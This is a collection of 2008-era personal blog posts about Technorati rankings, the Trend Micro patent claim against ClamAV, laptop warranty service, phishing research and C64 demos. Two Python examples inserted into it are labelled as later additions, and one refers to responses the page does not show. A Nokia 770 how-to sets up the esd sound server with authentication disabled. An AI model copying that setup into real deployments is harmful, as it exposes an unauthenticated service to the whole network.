This bug had caused a number of blogs to be dropped from the list, since I was using "inboundblogs and inboundlinks == 0" as an indication that a blog was not registered with Technorati.

It's now worked around in my code, although a side-effect is that blogs which have this set will appear with question-marks in the 'inboundblogs' and 'inboundlinks' columns, and will perform poorly in the 'ranked by inbound link count' table (unsurprisingly).

I've posted a query to the support forum -- let's see what the story is.
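One way to avoid the failure described in this post, as an added example (not the code behind the Top 100 list): parse the bloginfo response so that an empty count becomes "unknown" rather than 0, and an epoch 'lastupdate' becomes "unknown" rather than a date. The first two inputs are trimmed copies of the responses above; the third response and the rule "a rank or a non-zero count means registered" are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)

# Trimmed copy of the degraded response shown above.
DEGRADED = """<!-- generator="Technorati API version 1.0" -->
<tapi version="1.0"><document><result>
  <url>http://www.pixelbeat.org</url>
  <weblog>
    <name>Pádraig Brady</name>
    <url>http://www.pixelbeat.org</url>
    <rssurl></rssurl><atomurl></atomurl>
    <inboundblogs></inboundblogs>
    <inboundlinks></inboundlinks>
    <lastupdate>1970-01-01 00:00:00 GMT</lastupdate>
    <rank>74830</rank>
  </weblog>
</result></document></tapi>"""

# Trimmed copy of the complete response shown above.
HEALTHY = """<tapi version="1.0"><document><result>
  <url>http://taint.org</url>
  <weblog>
    <url>http://taint.org</url>
    <inboundblogs>143</inboundblogs>
    <inboundlinks>227</inboundlinks>
    <lastupdate>2008-02-12 11:48:10 GMT</lastupdate>
    <rank>43404</rank>
  </weblog>
</result></document></tapi>"""

# Constructed, hypothetical response for a blog unknown to the service.
UNREGISTERED = """<tapi version="1.0"><document><result>
  <url>http://unregistered.example</url>
  <weblog>
    <url>http://unregistered.example</url>
    <inboundblogs>0</inboundblogs>
    <inboundlinks>0</inboundlinks>
    <lastupdate>1970-01-01 00:00:00 GMT</lastupdate>
    <rank></rank>
  </weblog>
</result></document></tapi>"""


def _int_or_none(text):
    """Empty or missing element -> None (unknown), never a silent 0."""
    text = (text or "").strip()
    return int(text) if text.isdigit() else None


def parse_bloginfo(xml_text):
    weblog = ET.fromstring(xml_text).find("document/result/weblog")
    if weblog is None:
        return {"registered": False, "rank": None, "inboundblogs": None,
                "inboundlinks": None, "lastupdate": None}
    info = {name: _int_or_none(weblog.findtext(name))
            for name in ("rank", "inboundblogs", "inboundlinks")}
    stamp = (weblog.findtext("lastupdate") or "").strip()
    when = None
    if stamp:
        when = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S GMT")
        when = when.replace(tzinfo=timezone.utc)
        if when == EPOCH:          # epoch is a placeholder, not a real date
            when = None
    info["lastupdate"] = when
    # Assumed rule: any rank, or any non-zero count, means the blog is known.
    info["registered"] = (info["rank"] is not None
                          or bool(info["inboundblogs"])
                          or bool(info["inboundlinks"]))
    return info


def table_cell(value):
    """Unknown values render as a question mark, as in the list's columns."""
    return "?" if value is None else str(value)


if __name__ == "__main__":
    for label, doc in (("degraded", DEGRADED), ("healthy", HEALTHY),
                       ("unregistered", UNREGISTERED)):
        info = parse_bloginfo(doc)
        print(label, info["registered"], table_cell(info["inboundblogs"]),
              table_cell(info["inboundlinks"]), table_cell(info["rank"]))
```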

Interesting Irish Blog Awards shortlistee

This year's Irish Blog Awards shortlists were posted yesterday. I maintain the Irish Blogs Technorati Top 100 list, so good sources of Irish blog URLs are always welcome; I took the shortlisted blogs and added them all.

Interestingly, straight in at number 2 went towleroad.com (warning: not worksafe!). It has a staggering Technorati rank of 1074 -- way ahead of Donncha's 5831 or Mulley's 8678. I was pretty curious as to how an Irish blog could hit those heights without me having heard of it, so I took a look.

Let's just say the content isn't quite what you'd expect to find in a blog shortlisted for 'Best News/Current Affairs Blog' -- a little bit short on Irish news, but heavy on pictures of naked guys getting off with each other. ;)

I took a quick glance, and I couldn't spot any Irish content. WHOIS says the publisher is LA-based, so I'm curious as to what qualified it as an "Irish blog"...

(by the way, I tried to leave a comment on the blog entry, but it appears Akismet is marking my comments as spam on a number of Wordpress-based blogs at the moment. Yes, I am aware of the irony. No, if SpamAssassin was a blog-spam filter, it wouldn't do that ;)

Update: it's sorted -- they're now gone. Also, it appears I've been removed from the Akismet blacklist, yay.

More on the Trend Micro patent

Dutch free knowledge and culture advocacy group ScriptumLibre.org has called for a worldwide boycott of Trend Micro products. Their chairman, Wiebe van der Worp, claims Trend Micro's aggressive use of litigation is "well beyond the borders of decency".

Also, this Linux.com feature has a great quote from Jim Zemlin, the executive director of the Linux Foundation:

"A company that files a patent claim against code coming from a widely adopted open source project vastly underestimates the self-inflicted damage to its customer and community relationships. In today's world, all of our customers in the software industry are enjoying the benefits of a wide variety of open source projects that provide stability and vendor-neutral solutions to the most basic of their computing needs. I talk to those customers every day. They consider these claims short-sighted and those that assert them to be fearful of their ability to compete in today's economy."

Well said.

Plug: Lenovo service still rocks

I needed to buy a new laptop for work a few months back, and after a little agonizing between the MacBook Pro and a Thinkpad T61p, I plumped for the latter. As I noted at the time, one of the major selling points was the quality of IBM/Lenovo's after-sales warranty service, compared to the atrocious stories I'd heard about AppleCare in Europe. I was, however, taking a leap of faith -- I had used IBM service to great effect in the US, but had never actually tried it out in Ireland.

Sadly, I had to put this to the test today, after the hard disk started producing these warnings:

/var/log/messages:Feb  7 11:21:13 wall kernel: [2075890.116000] end_request: I/O error, dev sda, sector 116189461
/var/log/messages:Feb  7 11:21:38 wall kernel: [2075914.824000] end_request: I/O error, dev sda, sector 116189460
/var/log/messages:Feb  7 11:24:18 wall kernel: [2076075.072000] end_request: I/O error, dev sda, sector 116189462
/var/log/messages:Feb  7 11:25:05 wall kernel: [2076121.932000] end_request: I/O error, dev sda, sector 116189463

It's a brand new machine, and a Hitachi TravelStar 7K100 drive, with a good reputation for reliability -- but these things do happen. :(

Interestingly, I thought this was a case of the Bathtub curve in action -- but this comprehensive CMU study of hard drive reliability notes that the 'infant mortality' concept doesn't seem to apply to current hard-drive technology:

Replacement rates [of hard drives in a cluster] are rising significantly over the years, even during early years in the lifecycle. Replacement rates in HPC1 nearly double from year 1 to 2, or from year 2 to 3. This observation suggests that wear-out may start much earlier than expected, leading to steadily increasing replacement rates during most of a system’s useful life. This is an interesting observation because it does not agree with the common assumption that after the first year of operation, failure rates reach a steady state for a few years, forming the “bottom of the bathtub”.

Anyway, I digress.

I ran the BIOS hard disk self-test, got the expected failure, then rang up Lenovo's International Warranty line for Ireland. I got through immediately to a helpful guy in India, and gave him my details and the BIOS error message; he had no tricky questions, no guff about me using Linux rather than Windows, and there were no attempts to sting me for shipping.

There's now a replacement HD (and a set of spare recovery disks, bonus!) winging their way via 2-day shipping, expected on Tuesday; I'm to hand over the broken HD to the courier once it arrives. Fantastic stuff!

Assuming the courier doesn't screw up, this is yet another major win for IBM/Lenovo support, and I feel vindicated. ;)

Update: the HD arrived this morning at 10am -- a day early. Very impressive!

CEAS needs your ham

CEAS 2008 is doing another Spam Challenge test of various spam-filters, and as part of this, they need samples of ham mail messages.

As part of the data collection effort, we have set up a website through which it is possible to donate non-sensitive legitimate email, to be used in the evaluation. Any kind of email that the recipient considers legitimate is welcome, including computer generated (non-spam) messages.

After the CEAS evaluation, the benchmark data will be made publicly available to facilitate future research and development in the field of spam prevention.

Here is the collection site; they accept UNIX mbox format, and tar.gz or zip files of same, with an 8MB upload limit.

Remote sound playback through a Nokia 770

For a while now, I've been using various hacks to play music from my Linux laptop, holding my main music collection, to client systems which drive the speakers.

Previously, I used this setup to play via my MythTV box. Nowadays, however, my TV isn't in the room where I want to listen to music. Instead, I have my Nokia 770 hooked up to the speakers; this plays the BBC Radio 4 RealAudio streams nicely, and also the laptop's MP3 collection using a uPnP AV MediaServer.

I specifically use TwonkyMedia right now, playing back via the N770's Media Streamer app. (That works pretty well -- uPnP AV is one of those standards plagued with incompatibilities, but TwonkyMedia and Media Streamer seem to be a reliable combination.)

However, TwonkyMedia sometimes fails to notice updates of the library, and nothing has quite as good a music-player user interface as JuK, the KDE music player and organiser app, so a way to play directly from the laptop instead of via uPnP would be nice...

A weekend's hacking reveals that this is pretty easily done nowadays, thanks to some cool features in pulseaudio, the current standard sound server on Ubuntu gutsy, and the Esound server running on the N770.

Unfortunately, the N770 doesn't (yet) support pulseaudio directly, otherwise we could use its seriously cool support for RTP multicast streams. Still, we can hack something up using the venerable "esd" protocol (again!) Here's how to set it up...

On the N770:

You need to fix the N770's "esd" sound server to allow public connections. Set up your wifi network's DHCP server to give the N770 a static IP address. Log in over SSH, or fire up an xterm. Run the following:

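# Keep the original binary and put a wrapper script in its place
mv /usr/bin/esd /usr/bin/esd.real

# The heredoc delimiter is quoted so that "$@" is written into the wrapper
# literally instead of being expanded (to nothing) by the current shell.
# -tcp -public listens for connections from other hosts, and -promiscuous
# starts the server unlocked (no esd authentication), so anyone on the
# wifi network can connect to it.
cat > /usr/bin/esd <<'EOM'
#!/bin/sh
exec /usr/bin/esd.real -tcp -public -promiscuous -port 5678 "$@"
EOM

chmod 755 /usr/bin/esd
/etc/init.d/esd restart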

On the server:

Download this file, and save it as n770.pa. Edit it, and change server=n770:5678 on the fourth line to use the IP address or hostname of your Nokia 770 instead of n770. Then run:

cp n770.pa ~/.n770.pa

cat > ~/bin/sound_n770 <<EOM
#!/bin/sh
pulseaudio -k; pulseaudio -nF $HOME/.n770.pa &
EOM

cat > ~/bin/sound_here <<EOM
#!/bin/sh
pulseaudio -k; pulseaudio &
EOM

chmod 755 ~/bin/sound_here ~/bin/sound_n770

Now you just need to run '~/bin/sound_n770' to redirect sound playback to the N770, and '~/bin/sound_here' to reset back to laptop speaker output, for the entire desktop environment. Nifty!

Update: it appears that things may work more reliably if you add "rate=22050" at the end of the "load-module module-esound-sink" line -- this halves the bitrate of the network stream, which copes better with harsh wifi network conditions. The n770.pa file above now includes this.

Irish crumblies don’t trust blogs

It appears a public relations firm, Edelman's, recently performed a phone survey which concluded that bloggers are the "least trusted" source of information in Ireland. This has been widely reported:

on Edelman Dublin's blog:

When we consider who we trust the most as a spokesperson in Ireland, the most trusted sources of information include, financial or industry analysts at 62%, followed by a doctor or healthcare specialist at 57%, an NGO representative at 57% and academics at 53%. Bloggers are the least trusted at 7%.

at Silicon Republic:

Bloggers have emerged as the “least trusted” group in the country.

and on ElectricNews.net:

"What has been interesting to note in this year's findings is the apparent low standings of bloggers and social media in general," said [Mark Cahalane, managing director of Edelman Dublin]. "One interpretation of the survey would be that bloggers have now entered the mainstream and people no longer distinguish between blogs and ordinary websites. This is also reflected by the fact that numerous high profile bloggers are widely quoted in the media."

However, as Damien noted, Piaras Kelly raised a very significant point about this -- 'the people surveyed for the research had to fit a certain demographic, including having to be aged between 35-64.' [...] 'A Generational gap is evident.' This press release corroborates that. Sure enough, most blog readers (and writers) would tend to be of the younger generation -- a pretty key point, one would assume, but one that most of the non-blogger coverage has omitted ;)

(Update: the term "authority figure" wasn't quite correct; replaced with what Edelman themselves use, "source of information".)

Trend Micro’s attack on open source

Trend Micro are demanding that Barracuda Networks pay licensing fees, alleging that they infringe U.S. Patent No. 5,623,600 with their use of the open-source anti-virus tool ClamAV. Here's a Barracuda press release, and here's some details from Barracuda:

Trend Micro alleges that Barracuda Networks and ClamAV infringe on Trend Micro's U.S. Patent No. 5,623,600. Barracuda Networks believes that the patent is invalid due to prior art and further believes that neither its products nor the ClamAV software infringe the patent.

On Sept. 21, 2006, Trend Micro sent Barracuda Networks a letter regarding a license to Trend Micro's '600 patent. After several discussions on paying a license for the patent, Trend Micro demanded Barracuda Networks either remove ClamAV from its products or pay a patent license fee. Barracuda Networks felt it had no choice other than to file for a declaratory judgment in early 2007 in U.S. Federal Court to invalidate Trend Micro's '600 patent and end continued legal threats against Barracuda Networks for use of the free and open source ClamAV software.

Trend Micro subsequently responded to that declaratory action and more recently, Trend Micro filed a claim with the International Trade Commission (ITC). The ITC voted to investigate the claim in December 2007. Trend Micro's ITC claim alleges that Barracuda Networks infringes on Trend Micro's '600 patent, but effectively implies that anyone using the free and open source ClamAV software at the gateway infringes the patent.

The interesting aspects of this case, from my point of view, are twofold -- the patent is a classic bad software patent, very broad and totally obvious both now and at the time it was issued; and it hinges on Barracuda's use of the free software antivirus product, ClamAV. Given Apache SpamAssassin's prevalence in many anti-spam mail filtering appliances (including Barracuda!), this is a very worrying precedent for us -- our product could be next, for some other patent troll company's extortion scheme.

For what it's worth, it appears this patent has long been a licensing moneyspinner for Trend. In 1997, once the patent was issued, Trend went on a spree; McAfee, Symantec and Integralis were sued, eventually buying licenses, as did Electric Mail Company. 2 years ago, Fortinet were sued and settled in their case.

I happily gave Barracuda a quote for their press release on this:

"Trend Micro's actions are clearly an attack on free and open source software and its users, as well as on Barracuda Networks. The '600 patent covers a trivial method, one which was obvious to anyone skilled in the art at the time the patent was written, and should be rendered invalid as soon as possible. I hope that Barracuda Networks is successful in its attempts to defend all users from this patent shakedown."

If you know of prior art for this patent, please head over to Barracuda's site and provide details -- helping to fend off this protection racket would be good for all of us. Barracuda say:

People should look for art dated prior to Trend Micro's filing date of September 26, 1995. The '600 patent is entitled "Virus Detection And Removal Apparatus For Computer Networks." We are interested in all material, including software, code, publications or papers, patents, communications, other media or Web sites that relate to the technology described prior to the filing date.

In particular, this prior art should show antivirus scanning on a firewall or gateway. However, many of the claims do not require virus detection at a gateway. So any material that illustrates virus scanning on a file server is also of interest.

We also believe that a product called MIMESweeper 1.0 from a company called Clearswift, Authentium, or Integralis anticipates several claims of the '600 patent. We have yet to locate a copy of this product and would appreciate anyone who has a copy sending it our way.

Some more coverage:

  • Don Marti at LinuxWorld: 'Regardless of the decision in this case, software patent trolls will continue to be a problem for all software companies, Eben Moglen says. "Getting them to [not operate] in your neighborhood is the best you can do."'

  • Matt Asay at C|Net: 'Antivirus and antispam innovation has tended to come from open source, not the large proprietary vendors. Trend Micro's lawsuit is designed to put cash in its pocket but will end up hurting the consumer.' (Matt led with my quote ;)

  • GrokLaw: 'Anyone using ClamAV, should Trend Micro be successful, is potentially a target.'

  • Ars Technica: 'The patent is very clearly without merit, but that hasn't stopped Trend Micro from using it to threaten ClamAV and extort money from several companies. Situations like this demonstrate a very urgent need for patent reform and illuminate the risks posed by broad software patents, particularly in the area of security.'

Interview with two phish-scene infiltrators

/. posted a link to this interview with Nitesh Dhanjani and Billy Rios, two guys who have infiltrated the "phishing underground".

It's a good article -- lots of detail on the current toolset of a typical phisher, and some details on the community itself:

I had always thought that most phishers were clever hackers evading authorities using the latest evasion techniques and tools. The reality of the matter is most of the phishers we tracked were sloppy and unsophisticated. The tools they used were rarely created by the phisher deploying the actual scam, and for the most part it seemed the phisher merely downloaded kits and tools from some place and reused over and over and over again. It also seemed that many phishers don't even really understand how the phishing kits they've deployed work! We also came across many phishing kits and tools that had simple backdoors written into the source code (essentially, phishers phishing phishers). These backdoors are easily spotted by anyone who has even a basic idea of how the source code flow worked, yet was undetected by many phishers. Maybe a few phishers out there are skilled, but the majority are clueless.

Here's something I've noted about spammers, too -- there's no honour among thieves:

The number of backdoors we saw was staggering. The servers serving the phishing sites had backdoors, the code used in the phishing kits had backdoors, the tools used by phishers had backdoors. Phishers aren't afraid to steal from regular people and they are also not afraid to steal from other phishers. Some of the backdoors were meant to keep control over a compromised server, while others simply stole information that had been stolen by other phishers! We came across several forums where phishers, scammers, and carders basically identified other phishers, scammers, and carders that had scammed them. These shady characters may work with each other but they sure don't trust each other, that's for sure.

And this is a very important point about blacklists:

Phishers are likely to abuse the blacklists published for [anti-phishing] plugins for their own benefit. The blacklists are a list of known phishing sites that the plugins consume in order to identify what websites are fraudulent. These blacklists therefore contain IP addresses and host names of servers hosting phishing sites. Since phishing sites are commonly installed on servers that have been compromised, and phishers don't bother to patch systems they have installed their kits on, this list translates to a 'list of easily compromisable hosts' for other phishers.

On the latter point, this is one of the key benefits of DNS blocklists, compared to the downloaded, text-based style that Google initially used for its anti-phishing toolbar. To query a DNSBL, you need to know the address you're looking for first of all; but with a text file, you can read the lists in their entirety, without knowing the address in advance. (Google is now apparently tending to use the enchash format, which fixes this.)
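The difference described above, as an added example (not from the original post, and not an implementation of Google's enchash format): a DNSBL-style lookup and a hashed list both answer "is this one entry listed?" without handing out a readable list. The zone name, addresses and hostnames are constructed, and the SHA-256 scheme is an assumption chosen for illustration.

```python
import hashlib
import ipaddress

# Constructed sample entries (documentation address ranges and example domains).
LISTED_IPS = ["192.0.2.10", "198.51.100.7"]
LISTED_HOSTS = ["login-verify.example.net", "secure-update.example.org"]
ZONE = "dnsbl.example.org"  # hypothetical DNSBL zone


def dnsbl_query_name(ip, zone=ZONE):
    """Name a client resolves for an IPv4 address: reversed octets + zone."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


# Stand-in for the DNSBL's zone data; a real client would send a DNS A query.
ZONE_DATA = {dnsbl_query_name(ip): "127.0.0.2" for ip in LISTED_IPS}


def dnsbl_lookup(ip):
    """Return the listing answer, or None (NXDOMAIN) if the address is unlisted."""
    return ZONE_DATA.get(dnsbl_query_name(ip))


def normalise(host):
    """Canonical form so publisher and client hash the same bytes."""
    return host.strip().lower().rstrip(".")


def digest(host):
    """SHA-256 hex digest of the normalised hostname."""
    return hashlib.sha256(normalise(host).encode("ascii")).hexdigest()


# What the publisher ships: digests only, no readable hostnames.
HASHED_LIST = {digest(h) for h in LISTED_HOSTS}


def is_listed(host):
    """Client-side check: hash the host being visited and test membership."""
    return digest(host) in HASHED_LIST


if __name__ == "__main__":
    print(dnsbl_query_name("192.0.2.10"))
    print(dnsbl_lookup("192.0.2.10"), dnsbl_lookup("192.0.2.11"))
    print(is_listed("Login-Verify.Example.NET."), is_listed("www.example.com"))
```

Hashing protects hostnames and URLs well because the space of possible names is huge; the IPv4 space is small enough to hash exhaustively, so for bare addresses a query-only service is the stronger choice.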

And a final word:

For the next few years, we are going to continue to apply band-aids around the problem of data leakage, and continue to play whack-a-mole with the phishers without solving the actual problem at hand. In order to make any significant progress, we must come up with a brand new system that does away with depending on static identifiers. We will know we've accomplished this when we will be able to publish our credit reports publicly without fearing for our identities.

(I'd place more importance on the liability of the financial institutions, myself -- I think they get away with placing too much blame on the victims of fraud and identity theft.)

Good interview -- worth reading.

Insane Dell.ie markup

A good deal came up on a mailing list I'm on: SAMSUNG 245BW Black High Glossy 24" 5ms DVI Widescreen LCD Monitor for $459.99, or $409.99 after rebate, via Newegg.

A follow-up from a German poster: he'd just picked up a Dell 2407WFP-HC 'for the low, low price of 659 EUR'.

We marvelled at the price difference -- then I looked up Dell.ie for comparison. I thought 659 EUR was bad, but Dell.ie is asking for 1,117.74 Euros inc VAT for the same product -- insane!!

What possible excuse could there be for that? EUR 458.74 worth of shipping maybe? Do they encase it in platinum? That's nearly three times the price of the Newegg monitor.

Update: Duh. I'm an idiot. That's a 2707WFP, not a 2407WFP; it's 3" bigger and quite a bit fancier. It appears Dell.ie is no longer selling the 2407WFP.

Bad law in North Dakota

This is very bad news for North Dakota-based anti-spammers -- a guy called David Ritz is being sued there by alleged porn spammer Jerry Reynolds, for performing DNS lookups, a DNS zone transfer and a Whois lookup. It appears the judge has found Ritz guilty.

This is astonishingly bad lawmaking by the judge. These are entirely innocuous tools, part of every network administrator's toolkit for debugging and examining internet traffic legitimately. There's nothing remotely criminal or malicious in their use, and the judge has allowed himself to be misled.

North Dakota Judge Gets it Wrong:

'Ritz's behavior in conducting a zone transfer was unauthorized within the meaning of the North Dakota Computer Crime Law. A zone transfer is simply asking a DNS server for all the particular public info it provides about a given domain. This is a common task performed by system administrators for many purposes. The judge is saying that DNS zone transfers are now illegal in North Dakota.'

More details from Ed Falk

David's legal defense fund

My Commodore 64 demos

I recently came across my record at the Commodore Scene Database, and was happy to find that someone had found and uploaded two demos I had written, back in my days as a member of the C=64 demo scene between 1988 and 1990:

(I was a member of the groups 'Excess' and 'Thundertronix' / 'TNT', going by the handle of 'Mantis'.)

With the help of CBA, I was overjoyed to track down another long-lost demo, my crowning achievement on the platform:

If you're curious, feel free to go read those wiki pages or download the .d64's -- they run fine in VICE, the Commodore emulator (amazingly). If you've only got time to check one, check Rhaphanadosis; it's much better than the others.

I'm very impressed with VICE. As far as I can tell, it's perfectly bug-for-bug compatible with the real hardware, playing all of the demos perfectly (apart from a little additional speed due to differing hardware performance). If you haven't already got VICE set up, bear in mind that after installing it, you'll need a copy of the C=64's ROM images; here's a local set.

Also, the Commodore Scene Database is pretty awesome -- it's a full-scale IMDB-style setup, tracking the history of the Commodore demo scene in massive detail. Nice work guys!

The demos were written 100% in 6502/6510 assembly. I developed them using an Action Replay cartridge's built-in monitor; it had an assembler, but one which didn't support symbolic addressing. In other words, every piece of assembly used hand-computed branch offsets, and every variable and subroutine was tracked -- on paper -- by memory location, rather than using symbolic labels. If you want to know what the monitor was like, the VICE built-in monitor is almost identical!

I wrote these when I was 16; part 4 of Rhaphandosis notes the date as being 20 May 1989.

It's interesting reading the scrollers, and doing web and CSDB searches in follow-up to see what happened next -- one of the other Excess members, Raistlin, is now Robert Troughton, a successful game developer in the UK with several major titles under his belt.

A Google search for Thundertronix finds a copy of "sex'n'crime" zine, issue 17, July 1990, which notes:

one of the new groups formed in 1990 (jm: slightly off, I think) is THUNDERTRONIX, better known as TNT. they are based in ireland and are doing very well for themselves. they have, in my mind, one of the best coders in the uk, namely MANTIS. he is currently coding a game with many new routines, etc... hopefully he should get some demos out soon!

woo! Er, unfortunately that game never went anywhere. ah well. ;)

BTW, it's funny reading my scrollers in those demos. At the time, I was convinced that the c=64 was a dead platform -- yet here we are in 2008, and there's still a thriving demo scene on the Commodore. Incredible!

Vincent Browne on RTE’s coke habit

Before Christmas, it seemed you could hardly read a newspaper, listen to the radio or watch TV in Ireland without being bombarded with stories about how the country was awash in cocaine.

It's an attractive story, tying in nicely with the death of lingerie model Katy French, hand-wringing over Ireland's recent 'celtic tiger' wealth, a supposed loss of our traditions, etc. etc. RTE, our national broadcaster, made a tabloid series called 'High Society', which cashed in on the issue in a particularly crass way -- crappy "reconstructions" of actors chopping lines with voiceovers, dodgy-looking men handing over money to ominous music, that kind of thing.

Well, just before Christmas, Vincent Browne wrote a fantastic op-ed in the Irish Times regarding this. I have to quote this particularly perceptive passage:

Cocaine abuse is a social problem, but the thrust of much of RTE's coverage of the phenomenon is to suggest that it is a widespread, pervasive problem. There are no recent statistics available on the prevalence of cocaine consumption in Ireland - the last survey was done four years ago. The National Advisory Committee on Drugs (NACD) will be publishing a prevalence report next month and we will know then the size of the phenomenon.

But we have some indicators about the scale of cocaine use. The European drug agency EMCDDA estimates that 3 per cent of all adults in Europe aged between 15 and 64 have used cocaine at least once in their lives.

A third of these took cocaine during the previous year and half of these took cocaine during the previous month. This means that about 0.5 per cent of the adult population took cocaine over the previous month. And the data suggests that, for at least two-thirds of those who have ever taken cocaine, the drug is not a problem for them.

In the US the statistics are higher. Almost 15 per cent of the population aged between 12 and 64 have taken cocaine in their lives and 2.5 per cent took cocaine over the previous year. Again, this is suggestive that cocaine use for most people is not a problem, otherwise the number of people who took cocaine during the previous year as a proportion of the number of people who ever took cocaine would be far higher.

The figures for Ireland are likely to be that about 4 per cent of the adult population have taken cocaine in their lifetime, with about 1 per cent having taken cocaine in the previous year and 0.5 per cent having taken cocaine in the previous month.

It would be better if people did not take cocaine, but the prevalent contention that the consumption of cocaine at all is necessarily harmful and addictive is obviously false.

It would also be better if people did not drink here, for the problems related to the consumption of alcohol are far, far greater than in the case of cocaine.

Instead of presenting a balanced picture of the cocaine phenomenon, RTE has greatly exaggerated the issue, in a way more typically associated with tabloid journalism.

Well said!